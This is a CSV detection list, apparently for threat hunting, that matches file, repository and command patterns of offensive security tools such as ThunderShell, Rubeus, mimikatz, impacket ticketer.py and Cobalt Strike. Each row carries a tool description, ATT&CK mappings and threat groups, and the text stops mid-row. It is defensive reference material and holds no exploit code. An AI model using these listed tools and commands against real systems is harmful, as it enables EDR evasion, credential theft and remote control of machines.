-*TheD1rkMtr/HeapCrypt*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*TheD1rkMtr/NTDLLReflection*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -*TheD1rkMtr/Pspersist*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.,T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,1,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*TheD1rkMtr/Shellcode-Hide*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*TheD1rkMtr/StackCrypt*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*TheD1rkMtr/UnhookingPatch*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,1,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*TheGejr/SpringShell*,offensive_tool_keyword,Spring4Shell,Spring4Shell Proof Of Concept/Information CVE-2022-22965,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/TheGejr/SpringShell,1,1,N/A,N/A,2,124,86,2022-04-04T14:09:11Z,2022-03-30T17:05:46Z -*theHarvester*,offensive_tool_keyword,theHarvester,E-mails. subdomains and names Harvester.,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/laramies/theHarvester,1,0,N/A,N/A,10,9250,1843,2023-10-02T22:12:14Z,2011-01-01T20:40:15Z -*thelinuxchoice/tweetshell*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*ThemeBleed.exe *,offensive_tool_keyword,themebleed,Proof-of-Concept for CVE-2023-38146,T1566.001 - T1077 - T1213.002,TA0007 - TA0011 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gabe-k/themebleed,1,0,N/A,10,2,143,27,2023-09-13T04:50:29Z,2023-09-13T04:00:14Z -*ThePorgs/Exegol-images*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*therealwover@protonmail.com*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*thewover/donut*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*thief.py -*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*third_party/SharpGen*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*third-party*winvnc*.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*thisisateststringdontcatchme*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*ThisIsNotRat-main*,offensive_tool_keyword,ThisIsNotRat,control windows computeur from telegram,T1098 - T1079 - T1105 - T1047 - T1059,TA0010 - TA0009 - TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RealBey/ThisIsNotRat,1,1,N/A,9,10,49,18,2023-09-10T07:39:38Z,2023-09-07T14:07:32Z -*thoth.py -*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*thoth-master.zip*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*Thread_Hiijack_Inject_Load.*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,1,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*ThreadlessInject* -p * -d *,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,0,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*ThreadlessInject.exe*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,1,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*ThreadlessInject-master*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,1,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*threads all alertable*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*ThreadStackSpoofer*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,1,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*ThreatCheck.csproj*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*ThreatCheck.csproj*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*ThreatCheck.exe*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*ThreatCheck.exe*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*ThreatCheck-master*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*threatexpress*,offensive_tool_keyword,Github Username,github repo hosting post exploitation tools,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/threatexpress,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*threatexpress*malleable*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,1,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*threatexpress/cs2modrewrite*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*ThunderDNS*.php*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,1,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*ThunderDNS*.ps1*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,1,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*ThunderDNS*.py*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,1,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*ThunderDNS.git*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,1,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*ThunderFox.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*ThunderShell*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,0,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*ThunderShell.git*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*ThunderShell.py*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*ThunderShell-master.zip*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*thycotic_secretserver_dump.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*tiagorlampert*,offensive_tool_keyword,Github Username,github repo username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/tiagorlampert,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ticket.kirbi*,offensive_tool_keyword,mimikatz,Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*ticket.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*ticketConverter.py *.ccache *,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*ticketConverter.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ticketer.py -nthash*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ticketer.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ticketsplease adfs *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease azure *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease dcsync *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease ldap *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease saml *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease ticket --domain*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential 